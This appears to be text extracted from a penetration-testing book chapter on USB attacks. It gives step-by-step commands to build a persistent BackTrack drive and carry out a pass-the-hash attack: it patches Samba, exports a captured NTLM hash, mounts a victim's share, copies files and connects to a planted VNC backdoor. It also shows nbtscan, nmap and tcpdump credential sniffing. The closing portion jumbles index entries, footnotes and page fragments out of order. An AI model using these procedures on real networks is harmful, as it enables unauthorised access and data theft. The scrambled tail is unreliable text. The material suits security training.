chapter 7 Social Engineering and USB194 19. Type p for the second partition and press Enter. 20. Type 2 for your second partition number and press Enter. 21. When prompted, set the size of your second partition. Press Enter to accept the default value for the first cylinder. 22. Press Enter to accept the default value for the last cylinder. This will allocate the remaining space on your drive for the second partition. 23. Type t to change the partition system ID on your primary partition and press Enter. 24. Type 1 to select your first partition and press Enter. 25. Type b when prompted and press Enter. This will set your primary partition to FAT32. 26. Type t to change the partition system ID on your second partition and press Enter. 27. Type 2 to select your second partition and press Enter. 28. Type 83 when prompted and press Enter. This will set your second partition to Linux. 29. Type a to set your primary partition to active and press Enter. 30. Type 1 to select your first partition and press Enter. 31. Type w to write the partition table out to disk and exit, and then press Enter. 32. Type fdisk –l to view your partitions and press Enter. 33. Type mkfs.vfat /dev/sd*1 to format the primary partition and press Enter. 34. Type mkfs.ext3 –b 4096 –L casper-rw /dev/sd*2 to format your second parti- tion and press Enter. NOTE Thisnextseriesofinstructionswillbeusedtomakethedrivebootable. 35. Type mkdir /mnt/sd*1 and press Enter. 36. Type mount /dev/sd*1 /mnt/sd*1 and press Enter. 37. Type cd /mnt/sd*1 and press Enter. 38. Type rsync -avh /media/cdrom0/ /mnt/sd*1 and press Enter. 39. Type grub-install no-floppy root-directory=/mnt/sd*1 /dev/sd*1 and press Enter. NOTE Thissetofinstructionswillsetupthepersistentdrive. 40. Type cd /boot/grub and press Enter. 41. Type vi menu.lst and press Enter. 42. Change the default 0 line to default 4. Using the down arrow key, navigate to 0. 43. Once the cursor is under the 0, type x to delete the character. 44. Type a and enter 4. The line should look like the following code snippet when you are finished editing the line. Hacking the Wetware 195 By default, boot the first entry. default 4 45. Set the resolution to 1024 3 768 (or a relevant size to suit your configuration) by appending vga 5 0x317 to the kernel line. The next steps will walk you through this. 46. Using the down arrow key, navigate to the following line and place your cursor a space after the word quiet. 47. Type a and add vga 5 0x317. 48. The line should look like the below code snippet when you are done. title Start Persistent Live CD kernel /boot/vmlinuz BOOT=casper boot=casper persistent rw quiet vga=0×317 49. Type :wq! and press Enter to save your changes and exit vi. 50. Type reboot. Press Enter when prompted and remove the 2 GB drive. 51. Select Start Persistent Live CD. Alternately you can just wait 30 sec since we set it to autoboot to persistent mode. 52. The system will boot to a command prompt by default. Type startx to initialize the graphical user interface (GUI). To test persistence, all you need to do is create and save a file then reboot again. If your file is still there, you are good to go. If you will be using this build for penetrating a production environment, it is a good idea to consider encrypting your drive. Instructions for this are contained on the Backtrack site to aid in establishing an encrypted platform. H You will need to update the Backtrack build in order to accomplish this, so if you are using a 4 GB flash drive, you will be left with minimal space (approx 350 MB). Once again, consider using a drive larger than 4 GB. Pass the Hash, Dude There are many ways to obtain the hash from a system, and two of the attacks in this book will have this information available. The Switchblade approach pulls these when deployed with administrator privileges, and a RAM dump will also contain this information on any system that is running with an authenticated account. The attacks outlined in Chapter 3, “USB-Based Virus/Malicious Code Launch,” Chapter 4, “USB Device Overflow,” and Chapter 6, “Pod Slurping” can be crafted in a manner that will extract this information. For this attack, we will be using the hash extracted in Chapter 2, “USB Switchblade.” The following downloads will be required to complete the instructions in this sec- tion. We will use the persistent version of Backtrack 4 built in the previous section. • Samba3.0.22–Thistoolcanbedownloadedfromhttp://us3.samba.org/samba/ ftp/old-versions/samba-3.0.22.tar.gz H www.backtrack-linux.org/tutorials/ chapter 7 Social Engineering and USB196 • Adduserpatch()fromfoofus–Thistoolcanbedownloadedfromwww.foofus. net/jmk/tools/samba-3.0.22-add-user.patch • Passhashpatchfromfoofus–Thistoolcanbedownloadedfromwww.foofus. net/jmk/tools/samba-3.0.22-passhash.patch In this section, we will be installing the above tools simplify a pass-the-hash attack.AllofMicrosoft’sauthenticationprotocols–LANManager(LM),NTLAN Manager(NTLM), NTLM2, and evenKerberos5– are vulnerable to this attack. The Samba client approach can be performed on all with the exception of Kerberos. I The instructions included below will walk you through the installation of this tool on Backtrack 4 and illustrate a simple exploitation using a hash previously acquired. 1. Boot into Backtrack 4. 2. Type startx to launch the Backtrack 4 GUI. Figure 7.2 shows Backtrack initial- ized with the K menu activated. 3. If your network interface card is supported and you are on a Dynamic Host Configuration Protocol–enabled network, you should have Internet access. If you would like to connect to a wireless network, please follow steps 4 to 7. 4. Open a terminal window and type sudo start-network and press Enter. 5. Type cd /etc/init.d and then press Enter. Type wicd and press Enter again. 6. Click the K menu in the bottom left-hand corner of the Backtrack 4 GUI, navi- gate to the Internet menu, and launch WICD Network Manager. I www.sans.org/reading_room/whitepapers/testing/why_crack_when_you_can_pass_the_hash_33219 FIGURE 7.2 Backtrack OS Showing K Menu Hacking the Wetware 197 7. Find the access point to which you want to connect and click the small arrow to expand the selection information, as shown in Figure 7.3. The wireless local area network (WLAN) service set identifier (SSID) was removed to protect our privacy. 8. Click Advanced Settings and enter key information (change authenticating type if necessary) if relevant, and click OK. 9. Select Connect, and it should establish the connection. 10. Download the samba-3.0.22 client tar ball and both foofus patches into /opt using Firefox. This icon is located on the bottom toolbar. To download the patch files from Firefox in Backtrack 4, right-click the link and select Save link as. 11. Go back to the terminal window and type cd /opt and press Enter. 12. Type tar xvfz samba-3.0.22.tar.gz and press Enter. 13. Type patch -p0 <samba-3.0.22-add-user.patch and press Enter. 14. Type patch -p0 <samba-3.0.22-passhash.patch and press Enter. 15. Type cd /opt/samba3.0.22/source and press Enter. 16. Type ./configure with-smbmount and press Enter. 17. Type make and press Enter. 18. Type make install and press Enter. 19. Type mkdir /mnt/msshare and press Enter. You can call this share anything, but the mount point will be referenced as /mnt/msshare in these instructions. 20. From the K menu in the bottom-left-hand corner of the Backtrack 4 GUI, navi- gate to the Utilities menu and open the Kate text editor. FIGURE 7.3 WICD Network Manager Connection Options chapter 7 Social Engineering and USB198 21. Select New Session when prompted. 22. Select Open from the file menu. 23. Navigate to /etc and open fstab. 24. Add the following text to the bottom of this file. none /mnt/msshare tmpfs defaults 0 0 25. From the file menu, select Save and then close the file. 26. In the terminal window, type cd /etc/samba and press Enter. 27. Type cp smb.conf /usr/local/samba/lib/smb.conf and press Enter. 28. Type mount /mnt/msshare and press Enter. 29. Next, add your “acquired” hash (from the USB Switchblade or other acquisi- tion method) to the SMBHASH environment variable and enclose it in quotes. Below is an example of the export used in this testing. Type this command in the terminal exactly as shown. export SMBHASH="B5D61D16F77BD531BA4F48580E45DD17:4BD9DF48AFEE6A47AB04E37 4B488EF0A" 30. Type cd /opt/samba-3.0.22/source/bin and press Enter. 31. Type ./smbmount //x.x.x.x/sharename /mnt/msshare -o username=USER and press Enter, where x.x.x.x represents the IP address, sharename the share on the victim machine, /mnt/msshare the mount point you created earlier, and USER being the username associated to the hash you will be sending. 32. When prompted for the password, type at least one character and press Enter. It does not matter what you type here because the hash you entered earlier will used. 33. Type /mnt/msshare to check that you have successfully mapped the windows share. Use the ls command to list the files contained on the share. You have now successfully authenticated to a remote machine using the hash extracted from the target. Use the cp command while in the shared directory (for example, cp file.txt /directory) to a valid location on the Backtrack system. If you are using the administrator account or one supplied with advanced user rights, then you can attach to the administrator-level shares (for example, C$). Additionally, you can use the Konqueror GUI-based tool after authentication, which is included in the next set of instructions. If these are domain-level credentials, you can use these to enumerate or attach to relevant resources in the context of this user account if the permissions are supplied. In Chapter 2, “USB Switchblade,” a silent installation of VNC was completed on the target system. Backtrack has VNC built in, and you can bring up the viewer by typing vncviewer in a command shell. The GUI will initialize with a window for the IP address. Enter the appropriate IP address and the password “yougothacked,” without the quotes. Be careful when performing this on a machine someone may be using; people tend to freak out when the mouse cursor begins to have a mind of its own. Success was attained attaching to an XP system infected with the Switchblade Hacking the Wetware 199 FIGURE 7.4 Konqueror Icon Location package VNC version, although tests on a Vista machine failed. After updating the VNC client on the Vista machine, a successful connection was made to it. Consider updating VNC in the USB Switchblade package. If you were able to attain the password or a connection with the hash, Konqueror is a Web browser/file manager included on Backtrack that can be used to browse a remote host of choice. This is a very simple tool and works similar to Windows Explorer. The instructions below will describe how to accomplish this. 1. Open Konqueror by clicking the icon next to the K menu, as shown in Figure 7.4. 2. From the Location menu, select Open location. 3. Type \\x.x.x.x\sharename and select OK. Enter the appropriate IP address for x.x.x.x and sharename for that value. 4. Your previous session with Samba should allow you to connect in that context. If you are making a new connection, enter the credentials when prompted. You should now be able to browse to a location of your choice, as seen in Figure 7.5. To copy the files to the Backtrack system, simply right-click on the folder or file and select Copy. Click the Home Folder in the left pane to return to the local file system. Right-click anywhere in the right-hand pane and select Paste URL. That’s all there is to it. If you obtained domain credentials, then you may want to peek at the shares available on the network. Nbtscan is a tool included that will allow you to parse these entries on the network. The below instructions illustrate a sample command and output. chapter 7 Social Engineering and USB200 1. From the K menu, go to Backtrack, Network Mapping, Identify Live Hosts, and Nbtscan. 2. Type nbtscan –r x.x.x.x/xx –v and press Enter. x.x.x.x is the IP range and xx is the subnet (for example, 192.168.1.0/24). 3. Your output should appear something similar to the following code snippet Doing NBT name scan for addresses from 192.168.1.0/24 192.168.1.0 Sendto failed: Permission denied NetBIOS Name Table for Host 192.168.1.76: Incomplete packet, 48 bytes long. Name Service Type NetBIOS Name Table for Host 192.168.1.68: Incomplete packet, 48 bytes long. Name Service Type MARKETING <00> UNIQUE MARKETING <20> UNIQUE DOMAIN1 <00> GROUP Adapter address: 00:0e:35:af:58:e4 FIGURE 7.5 Konqueror Connection to Remote System Hacking the Wetware 201 NetBIOS Name Table for Host 192.168.1.67: Incomplete packet, 353 bytes long. Name Service Type STORALL <00> UNIQUE STORALL <03> UNIQUE STORALL <20> UNIQUE STORALL <00> UNIQUE STORALL <03> UNIQUE STORALL <20> UNIQUE __MSBROWSE__ <01> GROUP WORKGROUP <1d> UNIQUE WORKGROUP <1b> UNIQUE WORKGROUP <1d> UNIQUE WORKGROUP <1e> GROUP WORKGROUP <00> GROUP WORKGROUP <1e> GROUP WORKGROUP <1b> UNIQUE Adapter address: 00:00:00:00:00:00 NetBIOS Name Table for Host 192.168.1.101: Incomplete packet, 173 bytes long. Name Service Type SHIZSTUFF <00> UNIQUE WORKGROUP <00> GROUP WORKGROUP <1e> GROUP SHIZSTUFF <20> UNIQUE Adapter address: 00:1b:9e:2d:d6:b8 Another interesting way to pass the hash is by way of the Nmap engine, as described in a recent SANS publication. J You can also use Nmap for many things, one of which is to determine listening ports and services on a particular target. The below command example will provide you with this listing. In this example, a scan of a network range was done like that described in the Nbtscan above. nmap x.x.x.x/xx -T 4 -sV -P0 –n J www.sans.org/reading_room/whitepapers/testing/scanning_windows_deeper_with_the_nmap_ scanning_engine_33138 chapter 7 Social Engineering and USB202 Below is a small sample of a large amount of data it returned. This is a very noisy command, so do not run this on a production network unless they know what you are doing. ll 1000 scanned ports on 192.168.1.76 are closed Interesting ports on 192.168.1.101: Not shown: 988 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn 445/tcp open netbios-ssn 5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 5800/tcp open vnc-http TightVNC 5900/tcp open vnc VNC (protocol 3.8) 8888/tcp open sip Mbedthis-Appweb/2.4.0 (Status: 400 Bad Request) 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49158/tcp open msrpc Microsoft Windows RPC 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi : SF-Port8888-TCP:V=5.00%I=7%D=1/24%Time=4B5C04E0%P=i686-pc-linux- gnu%r(GetR SF:equest,B8,"HTTP/1\.0\x20302\x20Moved\x20Temporarily\r\nDate: \x20Sun,\x2 SF:024\x20Jan\x202010\x2014:29:08\x20GMT\r\nServer: \x20Mbedthis-Appweb/2\. SF:4\.0\r\nContent-length:\x200\r\nConnection:\x20close\r\ nLocation:\x20ht Notice the VNC service listening; somebody must have run USB Switchblade on this system. This command returned all ports of listening services on that sub- net range. Again, this is just a small sampling. Instead of enumerating services, maybe you just want to check out some traffic to see what else you can find. The below command will do a verbose dump of traffic on the network from the attached device. In this example, the test machine was using the WLAN network interface, so we indicated wlan0. If you are using a wired interface, then Eth0 will probably apply. Use the ifconfig command to determine the active interface that you are using. tcpdump -i wlan0 –A -vv >> sniff.txt 14:16:14.579737 IP (tos 0x10, ttl 64, id 56185, offset 0, flags [DF], proto TCP (6), length 64) 192.168.1.253.48149 > Hacking the Wetware 203 192.168.1.67.ftp: P, cksum 0xa884 (correct), 1:13(12) ack 8 win 92 <nop,nop,timestamp 3005818 441519635> E @.y@.@ C 3 sE \ z.Q USER administrator 14:16:14.589275 IP (tos 0x0, ttl 64, id 32045, offset 0, flags [DF], proto TCP (6), length 52) 192.168.1.67.ftp > 192.168.1.253.48149: ., cksum 0x3872 (correct), 8:8(0) ack 13 win 1448 <nop,nop,timestamp 441519822 3005818> E 4}-@.@.9 C sE ? 8r .Q z 14:16:14.589723 IP (tos 0x0, ttl 64, id 32046, offset 0, flags [DF], proto TCP (6), length 86) 192.168.1.67. ftp > 192.168.1.253.48149: P 8:42(34) ack 13 win 1448 <nop,nop,timestamp 441519822 3005818> E V}.@.@.8 C sE ? & .Q z331 Please specify the passwor 14:16:14.589771 IP (tos 0x10, ttl 64, id 56186, offset 0, flags [DF], proto TCP (6), length 52) 192.168.1.253.48149 > 192.168.1.67.ftp: ., cksum 0x3d99 (correct), 13:13(0) ack 42 win 92 <nop,nop,timestamp 3005821 441519822> E 4.z@.@ C ? sg \= }.Q 14:16:15.441250 arp who-has 192.168.1.64 (Broadcast) tell 192.168.1.254 s @ 14:16:16.442726 arp who-has 192.168.1.69 (Broadcast) tell 192.168.1.254 s E 14:16:16.443028 IP (tos 0x0, ttl 64, id 57257, offset 0, flags [DF], proto UDP (17), length 71) 192.168.1.253.37429 > vnsc-bak.sys. gtei.net.domain: [udp sum ok] 65303+ PTR? 69.1.168.192.in-addr. arpa. (43) E G @.@ S 5.5.3 69.1.168.192.in-addr.arpa 14:16:16.468578 IP (tos 0x0, ttl 55, id 59551, offset 0, flags [none], proto UDP (17), length 148) vnsc-bak.sys.gtei.net.domain > 192.168.1.253.37429: 65303 NXDomain q: PTR? 69.1.168.192.in- addr.arpa. 0/1/0 ns: 168.192.in-addr.arpa. (120) E 7 5.5 H 69.1.168.192.in-addr. arpa 14:16:17.164939 IP (tos 0x0, ttl 4, id 0, offset 0, flags [DF], proto UDP (17), length 353) 192.168.1.67.33333 > 239.255.255.250.1900: UDP, length 325 E a @ C 5.l.M.[NOTIFY * HTTP/1.1 HOST: 239.255.255.250:1900 CACHE-C 14:16:17.190319 IP (tos 0x10, ttl 64, id 56187, offset 0, [...]... serial bus (USB) descriptors, 104 f development, 103 105 device overflow device drivers, 99 100 ever-present exposures, 105 106 heap-based buffer, 101 103 outlook, 106 107 overview, 97–98 stack-based buffer, 100 101 drivers, 107 –114 flash drive, 91, 92 multipass, 208 pen drive, 67 Universal serial bus (USB) Hacksaw attacks defending against, 23–26 overview of, 5, 6 recreation of attack, 10 16 system... January 2 010 3 www.networkworld.com/newsletters/sec/2007 /102 2sec2.html Accessed January 2 010 4 http://classics.mit.edu/Tzu/artwar.html Accessed February 2 010 5 Vol I, Reason in Common Sense, George Santayana Accessed February 2 010 217 This page intentionally left blank Index Page numbers followed by f indicates a figure and t indicates a table A Absinthe tool, 184t Access control list (ACL), 108 Access-preservation... 184t–185t BartPE, 21 Biometrics behavioral, 210 211 and token authentication, 57 BIOS features, 147–148 BitLocker, 150–151 BitLocker to Go (BTG), 211–212 applying to flash, 212 Black-box testing, 180 Blat, 8 Boot sector, 72 Botnets, 88 Browser plug-ins, 74 BTCrack tool, 189t Buffer overflow, 97 heap-based, 101 103 stack-based, 100 101 C Cachedump, 34, 36 cacls, 108 Cain & Abel tool, 53 CD/DVD autorun,... their efforts Seven Deadliest Social Network Attacks (ISBN: 978-1-59749-545-5, Syngress) by Carl Timm provides an in-depth look into the evolving dangers and dire consequences which can occur Mwww.hg.org/article.asp?id=5778 Nwww.informit.com/articles/article.aspx?p=1350956&seqNum=5 207 208 CHAPTER 7  Social Engineering and USB USB Multipass Now that you have created all of these independent USB tools and... 141 Future Attribute Screening Technologies (FAST), 210 G GDB GNU Debugger tool, 190t GFI LanGuard tool, 185t Global positioning system (GPS), 145 GNU Wget, 32 GonZor payload configuration options dialogue, 42f Google AdSense, 89 grep, 132 Group Policy Editor, 110, 111f, 112f, 113f H Hardware-based encryption, 149 Heap-based buffer overflow, 101 103 Hex editor, 92 Hidattack tool, 189t History scraper,... prank to pull on fellow pupils USB- based attacks will continue to thrive on all systems where they are enabled or supported In fact, if you are reading this book from a Kindle device, several USB hacks already exist.LL Some provide tethering capabilities, while others offer procedures to install alternate operating systems.MM While these are not explicitly designed as attacks, they do provide an intriguing... tools, 8 10, 33–34 Universal serial bus (USB) Switchblade, 27 assembly, 38–39 defensive techniques, 54–55 biometrics and token security, 57 browser settings and screen savers, 61–63 password protection practices, 57–60 system execution prevention, 55–57 Windows group policy options, 60–61 evolving aspects, 52–54 payload, customizing, 39–43 privilege elevation, 54 tool, 32 USB- implementers forum (USB- IF),... might want to check out some of the recent initiatives out on the Web involving multiboot USB configurations The Hak.5 clan has one of these projects in the works and labels it the USB multipass There are several videos,O forum threads,P and blog entriesQ available online to help establish yourself as a lord of the USB Some additional bootable options you may want to consider are included below: • Trinity... depicts the newly added Removable Data Drive features at this level IIwww.h-online.com/security/news/item/NIST-certified -USB- Flash-drives-with-hardware-encryptioncracked-895308.html JJhttp://technet.microsoft.com/en-us/library/cc725828%28WS .10% 29.aspx 213 214 CHAPTER 7  Social Engineering and USB Figure 7.6 Windows 2008 Removable Storage Access Objects Figure 7.7 Windows 7 Removable Data Drive Group Policy... 7.8 Figure 7.8 Windows God Mode KKhttp://news.cnet.com/8301-13860_3 -104 23985-56.html 215 216 CHAPTER 7  Social Engineering and USB Summary Terrorist activities are increasing around the world, while September 11, 2001, still remains in the minds of many You can invest in the most innovative security solutions available today and these attacks will still succeed with minimal impedance Preventative technologies . system that is running with an authenticated account. The attacks outlined in Chapter 3, USB- Based Virus/Malicious Code Launch,” Chapter 4, USB Device Overflow,” and Chapter 6, “Pod Slurping” can. accomplished, impersonation of an established contact will significantly aid their efforts. Seven Deadliest SocialNetwork Attacks (ISBN: 978-1-59749-545-5, Syngress) by Carl Timm provides an in-depth look. occur. M www.hg.org/article.asp?id=5778 N www.informit.com/articles/article.aspx?p=1350956&seqNum=5 chapter 7 Social Engineering and USB2 08 USB Multipass Now that you have created all of these independent USB tools and bootable operat- ing environments, you are probably